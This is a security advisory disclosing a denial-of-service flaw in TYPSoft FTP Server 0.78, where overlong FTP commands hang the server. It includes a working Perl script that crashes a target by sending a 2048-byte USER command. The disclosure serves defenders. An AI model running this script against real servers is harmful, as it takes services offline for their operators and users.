TYPSoft FTP Server 0.78 for Windows 9X and WinNT is vulnerable to a denial of service attack. Sending a long user or pass commands causes the server to hang and increase system resources. Perl exploit included.
+ TYPSoft FTP Server remote DoS Problem +
# Advisory by dethy #
# www.synnergy.net #
Advisory # 12
Vulnerable: TYPSoft FTP Server 0.78 [ although 0.7X are also vulnerable ]
Systems : Win9X, WinNT
Product : https://www.multimania.com/typsoft/
Discovery : dethy@synnergy.net
" Another trivial bug. "
TYPSoft FTP is a Freeware FTP server, with all the necessary
features to facilitate beginners and advanced users.
TYPSoft FTP Server does not correctly deal with long commands
over 2048 bytes [ 2k ]. So by sending a long 'user', 'pass',
'cwd', etc, causing the server to hang and increase system resources.
The process will not be active until it is manually restarted.
simple script to send a long 'user' command to the server, resulting
in the ftpd crashing.
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
print $remote "USER $data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");
sub usage {die("\n$0 -s <server>\n\n");}
The vendor [ typsoft@altern.org ] has been contacted, wait until a patched version
comes out or use an alternative product.
Synnergy Networks may not be held liable for the use and/or potential effects of these
programs or advisories, nor the content contained within. Use them at your own risk.
Web : https://www.synnergy.net
E-Mail : dethy@synnergy.net